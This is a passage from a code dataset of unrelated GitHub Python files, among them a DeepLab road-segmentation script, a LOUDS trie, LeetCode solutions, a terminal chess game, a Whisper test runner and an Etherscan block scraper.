'/home/stmoon/Test/models/deeplabv3_cityscapes_train_2018_02_06.tar.gz'\nMODEL = DeepLabModel(download_path)\n\n\n# In[31]:\n\n\nimport glob\n\ndir_path = '/home/stmoon/Project/AE590/data/out4_20181102_170021/'\nout_path = '/home/stmoon/Project/AE590/deeplab/out/out5'\n\n\ndef extract_road(input_path, output_path) :\n file_list = sorted(glob.glob(dir_path + '/*.png'))\n\n for f in file_list :\n img = Image.open(f) \n\n resized_im, seg_map = MODEL.run(img)\n p = resized_im.load()\n\n for i in range(resized_im.size[0]) :\n for j in range(resized_im.size[1]) :\n if seg_map[j,i] == 0 :\n p[i,j] = tuple([int(x*0.3) for x in p[i,j]])\n \n resized_im.save(out_path + '/' + f.split('/')[-1])\n \n\n\n# In[69]:\n\n\nimport glob\nimport os.path\n\ndef extract_road(input_path, output_path) :\n file_list = sorted(glob.glob(input_path + '/*.png'))\n\n for f in file_list :\n file_path = output_path + '/' + f.split('/')[-1]\n file_path = file_path.replace('.png', '.txt')\n\n if os.path.exists(file_path) == False : \n\n print(f)\n \n img = Image.open(f) \n resized_im, seg_map = MODEL.run(img)\n \n np.savetxt(file_path, seg_map, fmt=\"%d\", delimiter=\",\")\n \n \n\n\n# In[70]:\n\n\nimport os\n\n#20181102_163625.mp4 20181102_164146.mp4 20181102_164558.mp4 20181102_164952.mp4 20181102_165724.mp4\n#20181102_163933.mp4 20181102_164357.mp4 20181102_164756.mp4 20181102_165208.mp4 20181102_170021.mp4\n\nvideo_name = [\n '20181102_163625', \n '20181102_164146',\n '20181102_164558',\n '20181102_164952',\n '20181102_165724',\n '20181102_163933',\n '20181102_164357',\n '20181102_164756',\n '20181102_165208',\n '20181102_170021']\n\nfor v in video_name :\n file_path = \"/home/stmoon/Project/AE590/data/out_\" + v\n out_path = \"/home/stmoon/Project/AE590/deeplab/out/out_\" + v\n print(file_path, out_path)\n os.makedirs(out_path, exist_ok=True)\n extract_road(file_path, out_path)\n\n\n# In[ ]:\n\n\n","repo_name":"stmoon/AE590","sub_path":"deeplab/extract_road.py","file_name":"extract_road.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72980414644","text":"class Node(object):\n \"\"\"\n The node of the tree.\n Each node has one character as its member.\n \"\"\"\n def __init__(self, value):\n self.value = value\n self.children = []\n self.visited = False\n\n def __str__(self):\n return str(self.value)\n\n def add_child(self, child):\n self.children.append(child)\n\n\nclass ArrayConstructor(object):\n \"\"\"\n This class has:\n a function which constructs a tree by words\n a function which dumps the tree as a LOUDS bit-string\n \"\"\"\n def __init__(self):\n self.tree = Node('') #The root node\n\n def add(self, word):\n \"\"\"\n Add a word to the tree\n \"\"\"\n self.build(self.tree, word)\n\n def build(self, node, word, depth=0):\n \"\"\"\n Build a tree\n \"\"\"\n if(depth == len(word)):\n return\n\n for child in node.children:\n # if the child which its value is word[depth] exists,\n # continue building the tree from the next to the child.\n if(child.value == word[depth]):\n self.build(child, word, depth+1)\n return\n\n # if the child which its value is word[depth] doesn't exist,\n # make a node and continue constructing the tree.\n child = Node(word[depth])\n node.add_child(child)\n self.build(child, word, depth+1)\n return\n\n def show(self):\n self.show_(self.tree)\n\n def show_(self, node, depth=0):\n print(\"{}{}\".format(' '*depth, node))\n for child in node.children:\n self.show_(child, depth+1)\n\n def dump(self):\n \"\"\"\n Dump a LOUDS bit-string\n \"\"\"\n from collections import deque\n\n bit_array = [1, 0] # [1, 0] indicates the 0th node\n labels = ['']\n\n #dumps by Breadth-first search\n queue = deque()\n queue.append(self.tree)\n\n while(len(queue) != 0):\n node = queue.popleft()\n labels.append(node.value)\n\n bit_array += [1] * len(node.children) + [0]\n\n for child in node.children:\n child.visited = True\n queue.append(child)\n return bit_array, labels\n","repo_name":"IshitaTakeshi/Louds-Trie","sub_path":"python/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"76"} +{"seq_id":"4966091733","text":"from collections import Counter\n\nclass Solution:\n def canTransform(self, start: str, end: str) -> bool:\n # 두 문자열의 각 알파벳 개수가 다른 경우 False\n if Counter(start) != Counter(end):\n return False\n\n # 두 문자열의 L, R의 순서가 다른 경우 False\n if start.replace('X', '') != end.replace('X', ''):\n return False\n\n # start에서 L이 있는 인덱스\n startL = []\n # start에서 R이 있는 인덱스\n startR = []\n # end에서 L이 있는 인덱스\n endL = []\n # end에서 R이 있는 인덱스\n endR = []\n\n # 두 문자열에서 L, R이 있는 인덱스 구하기\n for i in range(len(start)):\n if start[i] == 'L':\n startL.append(i)\n elif start[i] == 'R':\n startR.append(i)\n for i in range(len(end)):\n if end[i] == 'L':\n endL.append(i)\n elif end[i] == 'R':\n endR.append(i)\n\n # XL -> LX는 되지만, LX -> XL은 안 됨\n # 따라서, start의 L은 end의 L보다 인덱스가 커야 함\n for i, j in zip(startL, endL):\n if i < j:\n return False\n \n # RX -> XR은 되지만, XR -> RX는 안 됨\n # 따라서, start의 R은 end의 R보다 인덱스가 작아야 함\n for i, j in zip(startR, endR):\n if i > j:\n return False\n\n return True\n","repo_name":"2142022/Algorithm","sub_path":"LeetCode/Python/[Medium] 777 Swap Adjacent in LR String/Swap Adjacent in LR String.py","file_name":"Swap Adjacent in LR String.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25257969401","text":"#Revisar si una condicion es mayor a.\nbalance = 500\nif balance > 0:\n print(\"puedes pagar\")\nelse:\n print(\"no tienes saldo\")\n\n#Likes\nlikes = 200\nif likes >= 200:\n print(\"enahora buena has ganado 200 likes\")\nelse:\n print(\"Casi llegas a los 200 likes\")\n\n#If con texto\nlenguaje = \"php\"\nif not lenguaje == \"python\":\n print(\"excelente desicion\")\n\n#Evaluar un Booleano.\nusuario_autenticado = True\nif usuario_autenticado:\n print(\"Ha Accedido al sistema\")\n\nelse:\n print(\"debes inicar sesion\") \n\n#Evaluar un elemento de una lista.\nlenguajes = [\"Python\", \"Php\", \"JavaScript\", \"Java\", \"GO\"]\nif \"GO\" in lenguajes:\n print(\"Go si existe\")\nelse:\n print(\"No esta en la lista\")\n\n#If Anidados.\nusuario_autenticado = False\nusuario_admin = False\nif usuario_autenticado:\n if usuario_admin:\n print(\"ACCESO TOTAL\")\n else:\n print(\"Acceso al sistema\")\nelse:\n print(\"debes inicar sesion\") \n\n\n","repo_name":"nicolazZ02/playlist_python","sub_path":"08-condicionales.py","file_name":"08-condicionales.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23886419096","text":"import re\r\nipz = '10.1.192.38'\r\ns = []\r\nwith open('log.txt', 'r') as f:\r\n for line in f:\r\n if line.split()[0] == ipz:\r\n match = re.search(r'sid=/(\\S+)/&', line)\r\n s.append(match.group(1))\r\nsor = sorted(s)\r\nfor sid in sor: print(sid)","repo_name":"mysticms/testtask","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13480404407","text":"import argparse\nimport datetime\n\nfrom whisper_automatic_test.metrics_analyzer import MetricsAnalyzer\nfrom whisper_automatic_test.quality_indexes_analyzer import QualityIndexesAnalyzer\nfrom whisper_automatic_test.scenario_reader import get_scenarios_from_csv_file\nfrom whisper_automatic_test.scenarios_runner import ScenariosRunner\nfrom whisper_automatic_test.suggestions_responses_analyzer import SuggestionsResponsesAnalyzer\nfrom whisper_automatic_test.utility import get_requests, get_flat_suggestions_responses\nfrom whisper_automatic_test.whisper_api_adapter.recommenders import RecommenderType\nfrom whisper_automatic_test.whisper_api_adapter.whisper_api_adapter import get_suggestions_endpoint, \\\n get_whisper_api_version\nfrom whisper_automatic_test.whisper_api_adapter.whisper_api_adapter import get_suggestions_from_whisper_api\n\n\ndef run_whisper_automatic_test_for_each_recommender(whisper_api_base_url, whisper_api_version, is_verbose, scenarios):\n for used_recommender in RecommenderType:\n print('Testing recommender: ', used_recommender)\n run_whisper_automatic_test(whisper_api_base_url, whisper_api_version, is_verbose, scenarios, [used_recommender])\n\n\ndef run_whisper_automatic_test_for_all_recommender(whisper_api_base_url, whisper_api_version, is_verbose, scenarios):\n run_whisper_automatic_test(whisper_api_base_url, whisper_api_version, is_verbose, scenarios)\n\n\ndef main():\n program_arguments = get_program_arguments()\n scenarios_csv_file_path = program_arguments.scenarios_csv_file_path\n whisper_api_base_url = program_arguments.whisper_api_base_url\n is_verbose = program_arguments.verbose\n for_each_recommender = program_arguments.for_each_recommender\n whisper_api_version = get_whisper_api_version(whisper_api_base_url)\n scenarios = get_scenarios_from_csv_file(scenarios_csv_file_path)\n\n if for_each_recommender:\n run_whisper_automatic_test_for_each_recommender(whisper_api_base_url, whisper_api_version, is_verbose, scenarios)\n else:\n run_whisper_automatic_test_for_all_recommender(whisper_api_base_url, whisper_api_version, is_verbose, scenarios)\n\n\ndef run_whisper_automatic_test(\n whisper_api_base_url,\n whisper_api_version,\n is_verbose,\n scenarios,\n used_recommenders=None):\n def get_suggestions(request, chatkey):\n return get_suggestions_from_whisper_api(\n whisper_api_version,\n get_suggestions_endpoint(whisper_api_base_url),\n request,\n chatkey,\n used_recommenders\n )\n\n scenario_runner = ScenariosRunner(get_suggestions, get_time)\n suggestions_responses = scenario_runner.run(scenarios)\n suggestions_responses_analyzer = SuggestionsResponsesAnalyzer(scenarios, suggestions_responses)\n metrics_analyzer = MetricsAnalyzer(scenarios, suggestions_responses)\n quality_indexes_analyzer = QualityIndexesAnalyzer(metrics_analyzer)\n print_suggestions_responses_analysis(suggestions_responses_analyzer)\n print_metrics(metrics_analyzer)\n print_quality_indexes(quality_indexes_analyzer)\n if is_verbose:\n print_failing_requests_information(suggestions_responses_analyzer, scenarios, suggestions_responses)\n\n\ndef get_program_arguments():\n arguments_parser = argparse.ArgumentParser(description='Whisper automatic test runner.')\n arguments_parser.add_argument(\n '-s', '--scenarios-csv-file-path',\n action='store',\n required=True,\n help='Path to the scenarios CSV file',\n metavar='FILE'\n )\n arguments_parser.add_argument(\n '-w', '--whisper-api-base-url',\n action='store',\n required=True,\n help='Whisper API base URL',\n metavar='URL'\n )\n arguments_parser.add_argument(\n '-e', '--for-each-recommender',\n action='store_true',\n help='Run the test separately for each recommender',\n )\n arguments_parser.add_argument(\n '-v', '--verbose',\n action='store_true',\n help='Print more information',\n )\n return arguments_parser.parse_args()\n\n\ndef get_time():\n return datetime.datetime.utcnow()\n\n\ndef print_suggestions_responses_analysis(suggestions_responses_analyzer):\n print('Scenario results')\n print('=' * 80)\n print(suggestions_responses_analyzer.analyze_to_string())\n print()\n\n\ndef print_metrics(metrics_analyzer):\n metric_name_and_value_pairs = [\n ('Average system response time', metrics_analyzer.calculate_average_system_response_time()),\n ('Total number of messages', metrics_analyzer.calculate_messages_number()),\n ('Mean position of selected suggestions', metrics_analyzer.calculate_mean_position_of_selected_suggestions()),\n ('Total number of suggestions updates', metrics_analyzer.calculate_total_number_of_suggestions_updates()),\n ('Number of unwanted suggestions updates', metrics_analyzer.calculate_number_of_unwanted_suggestions_updates()),\n ('Number of selected suggestions', metrics_analyzer.calculate_number_of_selected_suggestions()),\n ('Number of suggested questions', metrics_analyzer.calculate_number_of_suggested_questions()),\n ('Number of suggested links', metrics_analyzer.calculate_number_of_suggested_links()),\n (\n 'Mean confidence level of selected suggestions',\n metrics_analyzer.calculate_mean_confidence_level_of_selected_suggestions()\n )\n ]\n\n print('Metrics')\n print('=' * 80)\n for metric_name_and_value_pair in metric_name_and_value_pairs:\n metric_name = metric_name_and_value_pair[0]\n metric_value = metric_name_and_value_pair[1]\n print(metric_name, \": \", metric_value)\n print()\n\n\ndef print_quality_indexes(quality_indexes_analyzer):\n pertinence_index = quality_indexes_analyzer.get_pertinence_index()\n speed_index = quality_indexes_analyzer.get_speed_index()\n quality_index_name_and_value_pairs = [\n ('Pertinence index', pertinence_index),\n ('Speed index', speed_index),\n (\n 'Relative confidence level accuracy index',\n quality_indexes_analyzer.get_relative_confidence_level_accuracy_index()),\n ('Intent accuracy index', quality_indexes_analyzer.get_intent_accuracy_index()),\n ('Confidence index', quality_indexes_analyzer.get_confidence_index()),\n ]\n average_quality_index = (\n sum(\n quality_index_name_and_value_pair[1]\n for quality_index_name_and_value_pair in quality_index_name_and_value_pairs\n ) / len(quality_index_name_and_value_pairs)\n )\n simple_quality_index = (\n pertinence_index +\n speed_index\n ) / 2.0\n\n print('Quality indexes')\n print('=' * 80)\n for quality_index_name_and_value_pair in quality_index_name_and_value_pairs:\n quality_index_name = quality_index_name_and_value_pair[0]\n quality_index_value = quality_index_name_and_value_pair[1]\n print(quality_index_name, \": \", quality_index_value)\n\n print('Average quality index: ', average_quality_index)\n print('Simple quality index (average of pertinence and speed indexes): ', simple_quality_index)\n print()\n\n\ndef print_failing_requests_information(suggestions_responses_analyzer, scenarios, suggestions_responses):\n failing_requests = get_failing_requests(scenarios, suggestions_responses, suggestions_responses_analyzer)\n failing_requests_information_messages = [\n 'Request #{}. Expected: {}. Actual suggestions: {}.'.format(\n failing_request['index'],\n failing_request['expected'],\n failing_request['suggestions']\n )\n for failing_request in failing_requests\n ]\n print('Failing requests')\n print('=' * 80)\n print('\\n'.join(failing_requests_information_messages))\n print()\n\n\ndef get_failing_requests(scenarios, suggestions_responses, suggestions_responses_analyzer):\n requests = get_requests(scenarios)\n flat_suggestions_responses = get_flat_suggestions_responses(suggestions_responses)\n requests_analysis = suggestions_responses_analyzer.analyze_scenarios()\n failing_requests = [\n {\n 'index': i,\n 'expected': '{{success_condition: {}, data: {}}}'.format(\n requests[i].get_success_condition(),\n requests[i].get_data()\n ),\n 'suggestions': flat_suggestions_responses[i].get_suggestions()\n }\n for i, request_analysis in enumerate(requests_analysis)\n if request_analysis.startswith('fail')\n ]\n return failing_requests\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CoveoWhisper/WhisperAutomaticTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9452600015","text":"def distCandy(candies) :\n res = []\n for i in candies :\n if i not in res :\n res.append(i)\n if len(res) < len(candies)//2 :\n return len(res)\n else :\n return len(candies)//2\n \n\n# cand = [1,1,2,2,3,3]\ncand = [1,1,2,3,3,4,5]\nprint(distCandy(cand))","repo_name":"vxela/altera-batch5-","sub_path":"Labs/DistributeCandies.py","file_name":"DistributeCandies.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37320836003","text":"def singleton(cls, *args, **kwargs):\n instance = {}\n def _singleton():\n if cls not in instance:\n instance[cls] = cls(*args, **kwargs)\n return instance[cls]\n return _singleton\n\n@singleton\nclass Test(object):\n a = 1\n\ntest = Test()\ntest1 = Test()\na = id(test)\nb = id(test1)\nprint(a)\n\nprint(id(test) == id(test1))","repo_name":"stephenchow007/django-test","sub_path":"aaaa.py","file_name":"aaaa.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"9947008638","text":"import sys\nsys.path.insert(0, '../')\nimport mysqlconnect\ncon = mysqlconnect.Connector()\nimport random\n\n\"\"\"\n // Initialize and add the map\n // 1 deg is around 110 km\n // 0.1 deg is around 110/10 i.e 10 km\n // 0.1 is around 10 km radius (approx)\n\"\"\"\n\ndef getNearby(n, loc, min=-0.1, max=0.1):\n locations = []\n lat, lng = loc['lat'], loc['lng']\n epsilon = 0.0\n for i in range(0, n):\n epsilon = random.random() * (max - min) + min;\n lat += epsilon;\n epsilon = random.random() * (max - min) + min;\n lng += epsilon;\n locations.append({\n 'lat': lat, 'lng': lng\n })\n return locations\n\n\n_LAHORE_LOCATION = {\n 'lat': 31.474221,\n 'lng': 74.376440\n}\n\ndef generator(n):\n if (n < 1):\n return\n user_list = con.query_to_list('select id from user')\n\n BUNCH_CENTER = [{\n 'lat': 31.538009,\n 'lng': 74.328593,\n 'label': 'Shadman'\n }, {\n 'lat': 31.501749,\n 'lng': 74.361698,\n 'label': 'Cavlary Ground'\n }, {\n 'lat': 31.474221,\n 'lng': 74.376440,\n 'label': 'DHA Phase 4'\n }];\n\n\n locations = []\n n = int((1/3)*n)\n for l in BUNCH_CENTER:\n locations += getNearby(n, l)\n\n print('generating ', n * len(BUNCH_CENTER), ' locations')\n users = []\n for loc in locations:\n user_pick_index = random.randint(0, len(user_list) - 1)\n user_id = user_list[user_pick_index][0]\n users.append(user_id)\n\n qry = \"\"\"\n INSERT INTO user_locations VALUES(NULL, %s, %s, NULL, %s)\n \"\"\"\n con.query_insert(qry, (loc['lat'], loc['lng'], user_id))\n\n print(\"for \", len(set(users)), \" users\")","repo_name":"zainulabidin302/foodpool-scripts","sub_path":"data_gen/user_locations_generator.py","file_name":"user_locations_generator.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7687091225","text":"import copy\nimport os\nimport place_piece\nimport how_far\n\n\ndead_white_pieces = []\ndead_black_pieces = []\n\n\ndef create_board(): \n board = []\n for i in range(8):\n ligne = []\n for j in range(8):\n if j % 2 == i % 2:\n #ligne.append(f\"{chr(j + 97)}{i + 1}\")\n ligne.append(\"+\")\n else:\n #ligne.append(f\"{chr(j + 97)}{i + 1}\")\n ligne.append(\" \")\n board.append(ligne)\n return board\n\ndef display_board(board, pieces): # pieces = [[0, 1, \"W\"], [2, 3, \"B\"]]\n tmp = copy.deepcopy(board)\n\n for piece in pieces:\n tmp[piece[1]][piece[0]] = piece[2]\n\n tmp.reverse()\n for lign in tmp:\n print(' '.join(lign))\n\ndef count_score(arr):\n score = 0\n\n for piece in arr:\n if piece == \"♙\" or piece == \"♟\":\n score += 1\n if piece == \"♖\" or piece == \"♜\":\n score += 5 \n if piece == \"♘\" or piece == \"♞\":\n score += 3\n if piece == \"♗\" or piece == \"♝\":\n score += 3\n if piece == \"♕\" or piece == \"♛\":\n score += 9\n\n return score\n\ndef compare_scores(num_1, num_2):\n if num_1 == num_2:\n return f\" \", f\" \"\n if num_1 > num_2:\n return f\"+{num_1 - num_2}\", \" \"\n else:\n return \" \", f\"+{num_2 - num_1}\"\n\ndef is_free(x, y, arr, moving_piece): # we consider a square occupied by an ennmy piece as free (returns 2)\n for index, piece in enumerate(arr):\n if piece[0] == x and piece[1] == y: # Checks if the piece is on the destination square\n if piece[5] != moving_piece[5]: # Checks if the piece is of the same color\n return (2, index)\n else:\n print(\"square is occupied by one of your pieces\")\n return (0, 0)\n return (1, 0) #free of any piece\n\ndef is_knight_move(start_pos, end_pos):\n if abs(start_pos[0] - end_pos[0]) == 1:\n if abs(start_pos[1] - end_pos[1]) == 2:\n return 1\n if abs(start_pos[0] - end_pos[0]) == 2:\n if abs(start_pos[1] - end_pos[1]) == 1:\n return 1\n return 0\n\ndef what_trajectory(start_pos, end_pos):\n if is_knight_move(start_pos, end_pos):\n return(\"k\", 1)\n if how_far.horizontally(start_pos, end_pos):\n return (\"h\", how_far.horizontally(start_pos, end_pos))\n if how_far.vertically(start_pos, end_pos):\n return (\"v\", how_far.vertically(start_pos, end_pos))\n if how_far.diagonally(start_pos, end_pos):\n return (\"d\", how_far.diagonally(start_pos, end_pos))\n return \"not a move\"\n\ndef is_way_free(start_pos, end_pos, arr):\n traj = what_trajectory(start_pos, end_pos) # ex: (\"v\", 5)\n biggest_y = int(max(start_pos[1], end_pos[1]))\n smallest_y = int(min(start_pos[1], end_pos[1]))\n biggest_x = max(start_pos[0], end_pos[0])\n smallest_x = min(start_pos[0], end_pos[0])\n\n if traj[0] == \"v\":\n for piece in arr:\n if piece[0] == end_pos[0] and piece[1] > smallest_y and piece[1] < biggest_y:\n print(\"vertical not free\")\n return 0\n return 1\n if traj[0] == \"h\":\n for piece in arr:\n if piece[1] == biggest_y and piece[0] > smallest_x and piece[0] < biggest_x:\n print(\"horizontal not free\")\n print(f\"piece captures {piece[2]}\")\n return 0\n return 1\n if traj[0] == \"d\":\n for piece in arr:\n piece_coords = []\n piece_coords.append(piece[0])\n piece_coords.append(piece[1])\n if how_far.diagonally(piece_coords, start_pos) and how_far.diagonally(piece_coords, end_pos) and piece[0] > smallest_x and piece[0] < biggest_x:\n print(\"diagonal not free\")\n print(f\"piece captures {piece[2]}\")\n return 0\n return 1\n\ndef pawn_promotes(piece, end_x):\n print(\"1 = queen, 2 = rook, 3 = knight, 4 = bishop\")\n #choice = input(\"What do you wish to promote your pawn to?\")\n if piece[5] == 1: # if pawn is white\n piece = [end_x, 7, \"♕\", [\"h\", \"v\", \"d\"], 7, 1]\n else: # if pawn isn't white\n piece = [end_x, 0, \"♛\", [\"h\", \"v\", \"d\"], 7, 1]\n\n return piece\n\ndef get_command(): # Checks for conformity of user input with expected args\n while True:\n move = input(\"Move it\")\n if len(move) != 4:\n continue\n x1 = move[0]\n y1 = move[1]\n x2 = move[2]\n y2 = move[3]\n try:\n y1 = int(y1)\n y2 = int(y2)\n except:\n print('Input should look like this: \"a1h8\"')\n continue\n if y1 < 1 or y1 > 8 or y2 < 1 or y2 > 8:\n print(\"Rows are within 1 and 8\")\n continue\n if x1 < 'a' or x1 > 'h' or x2 < 'a' or x2 > 'h':\n print(\"Columns are between A and H\")\n continue\n\n break\n return(move)\n\n\nbd = create_board()\n\npiece_arr = []\nplace_piece.place_pieces(piece_arr)\n\n\nwhile True:\n w_score = count_score(dead_white_pieces)\n b_score = count_score(dead_black_pieces)\n score = compare_scores(w_score, b_score)\n print(f\"{score[0]} Captured white pieces: {' '.join(dead_white_pieces)}\")\n\n display_board(bd, piece_arr)\n\n print(f\"{score[1]} Captured black pieces: {' '.join(dead_black_pieces)}\")\n\n move = get_command()\n os.system('cls' if os.name == 'nt' else 'clear') # Clears terminal before displaying board again\n\n\n start_x = ord(move[0]) - ord('a') # ex: h8h1 --> 7 7 7 0\n start_y = int(move[1]) - 1\n end_x = ord(move[2]) - ord('a')\n end_y = int(move[3]) - 1\n\n start_pos = (start_x, start_y) # (7, 7)\n end_pos = (end_x, end_y) # (7, 0)\n\n\n for piece in piece_arr:\n if not (piece[0] == start_x and piece[1] == start_y): # if the piece is not on start square\n continue # it won't be the one we want to move\n\n if not(is_way_free(start_pos, end_pos, piece_arr) or piece[2] == \"♘\" or piece[2] == \"♞\"):\n continue # if trajectory is not free and piece is not knight\n\n if not (what_trajectory(start_pos, end_pos)[0] in piece[3] and what_trajectory(start_pos, end_pos)[1] <= piece[4]):\n print(\"that piece does not move like that, or that far\")\n continue # Compares piece's allowed movements, to kind of trajectory and range\n\n if not (is_free(end_x, end_y, piece_arr, piece)[0]): # checks if the end square is free of any piece of mine\n continue\n\n if piece[2] == '♙' or piece[2] == '♟':\n if is_free(end_x, end_y, piece_arr, piece)[0] == 1:\n if end_y == 7 or end_y == 0:\n new_piece = pawn_promotes(piece, end_x)\n piece_arr.remove(piece)\n piece_arr.append(new_piece)\n piece[0] = end_x # If all the conditions match, move the piece\n piece[1] = end_y\n piece[4] = 1\n \n continue\n\n if is_free(end_x, end_y, piece_arr, piece)[0] == 2:\n piece_on_end_square = piece_arr[is_free(end_x, end_y, piece_arr, piece)[1]]\n print(f\"{piece[2]} takes {piece_on_end_square[2]}\")\n if piece_on_end_square[5] == 1: # 1 == white\n dead_white_pieces.append(piece_on_end_square[2])\n else:\n dead_black_pieces.append(piece_on_end_square[2])\n piece_arr.remove(piece_on_end_square)\n\n piece[0] = end_x # If all the conditions match, move the piece\n piece[1] = end_y\n break\n","repo_name":"JennaHuff/public-chess","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18302059938","text":"# This function squares every digit of a number.\n\ndef square_digits(num):\n final=[]\n x=map(int, str(num))\n for y in x:\n y=y**2\n final.append(y)\n final=map(str, final)\n return int(''.join(final))\n","repo_name":"SaashaJoshi/Python","sub_path":"Methods and Functions/listToInt.py","file_name":"listToInt.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1991209968","text":"from dataclasses import dataclass, field\nfrom parse import parse\n\nfrom .argument import Argument, EnumArgument\nfrom .device import Device\nfrom .parser import Parser, UTILITY\n\n\njump_fmt = '{addr}'\ncondition_fmt = '{cond} ? {left} : {right}'.replace(' ', '{:os}')\n\n\nconditions = {\n value: idx for idx, value in enumerate(\n ['F', 'Z1', 'Z2', 'Z1 && Z2', 'X1', 'X2', 'X3', 'X4']\n )\n}\n\n\ndef _addr(s: str):\n s = s.strip('A')\n \n return int(s)\n\n\n@dataclass\nclass TransitionalParser(Parser):\n Addr1: Argument\n Addr2: Argument\n Flags: EnumArgument\n End: Argument\n\n _devices: list[Device] = field(default_factory=list, init=False)\n \n def parse_line(self, line: str):\n result = parse(condition_fmt, line, UTILITY)\n \n if result is None:\n result = parse(jump_fmt, line, UTILITY)\n \n assert result is not None, f\"Unknown transition: {line}\"\n \n if result['addr'] == 'END':\n return {\n 'End': '1'\n }\n \n return {\n 'Addr1': f\"{_addr(result['addr']):b}\",\n 'Addr2': f\"{_addr(result['addr']):b}\",\n }\n\n assert result is not None, f\"Unknown transition: {line}\"\n\n return {\n 'Addr1': f\"{_addr(result['left']):b}\",\n 'Addr2': f\"{_addr(result['right']):b}\",\n 'Flags': result['cond']\n }\n\n def feed(self, idx: int, code: str):\n try:\n data = self.parse_line(code)\n except Exception as e:\n raise RuntimeError(f\"Line {idx} error: {e}\") from e\n \n # print(data)\n \n data = {\n key: value\n for mapping in [\n getattr(self, arg).create(data[arg], reverse=True)\n if arg in data else\n getattr(self, arg).create_default(reverse=True)\n for arg in [\n 'Addr1', 'Addr2', 'Flags', 'End'\n ] if getattr(self, arg)\n ]\n for key, value in mapping.items()\n }\n \n self.feed_devices(idx, **data)\n","repo_name":"mocurin/asvt-hw-3-encoder","sub_path":"src/transitional_parser.py","file_name":"transitional_parser.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14565574624","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport binascii as bina\nimport struct\nimport sys\n\ndef gather_blockinfo(nblock):\n# print nblock\n url = \"https://etherscan.io/block/\" + str(nblock)\n source = requests.get(url)\n #print source.text\n soup = BeautifulSoup(source.text, 'lxml')\n table = soup.find(id=\"ContentPlaceHolder1_maintable\")\n item = table.find_all('div')\n count = 1;\n result = \"\"\n\n\n for i in item:\n #diff\n if count is 16:\n #print int(re.sub(',','', i.text))\n #print hex(int(re.sub(',','', i.text)))\n result = str(hex(int(re.sub(',','', i.text))))\n hex_int = int(result[2:], 16)\n result_binary = \"{0:b}\".format(hex_int).zfill(64)\n for i in range(0,63):\n training_data.write(result_binary[i])\n training_data.write(\", \")\n training_data.write(result_binary[63])\n training_data.write(\"\\r\\n\")\n #print result_binary\n #nonce\n if count is 26:\n result = str(i.text)\n #print result\n hex_int = int(result[2:], 16)\n result_binary = \"{0:b}\".format(hex_int).zfill(64)\n for i in range(0,63):\n label_data.write(result_binary[i])\n label_data.write(\", \")\n label_data.write(result_binary[63])\n label_data.write(\"\\r\\n\")\n #print result_binary\n\n count += 1\n\n\ntraining_data = open(\"training_input_data.txt\",'a+')\nlabel_data = open(\"training_label_data.txt\",'a+')\nfor i in range(5000000 + int(sys.argv[1]), 5960300):\n gather_blockinfo(i)\n\ntraining_data.close()\nlabel_data.close()\n","repo_name":"NAKsir-melody/eth-function-tests","sub_path":"go-ethai/trainingset_crawl.py","file_name":"trainingset_crawl.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10414302059","text":"import math\n\ndef ilosc_opakowan_paneli(dl_podlogi, szer_podlogi, dl_panela, szer_panela, ilosc_paneli_w_opakowaniu):\n pow_podlogi = dl_podlogi * szer_podlogi\n pow_pomieszczenia = pow_podlogi * 1.1\n pow_panela = dl_panela * szer_panela\n ilosc_paneli = math.ceil(pow_pomieszczenia / pow_panela)\n ilosc_opakowan = math.ceil(ilosc_paneli / ilosc_paneli_w_opakowaniu)\n return ilosc_opakowan\n\nprint(ilosc_opakowan_paneli(5, 4, 1, 0.5, 10));","repo_name":"s25465JakubJarczyk/PPY","sub_path":"PPY-Zadanie4/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44193933948","text":"import time\nimport os \nfrom workers.WikiWorker import WikiWorker\nfrom yaml_reader import YamlPipelineExecutor\n\ndef main():\n scraper_start_time = time.time()\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n pipeline_location = os.path.join(dir_path,'pipelines','wiki_yahoo_scrapper_pipeline.yaml')\n yamlPipelineExecutor = YamlPipelineExecutor(pipeline_location = pipeline_location)\n yamlPipelineExecutor.process_pipline()\n\n yamlPipelineExecutor._join_workers()\n\n print('Extracting time took:', round(time.time() - scraper_start_time, 1))\n\nif __name__ == \"__main__\":\n 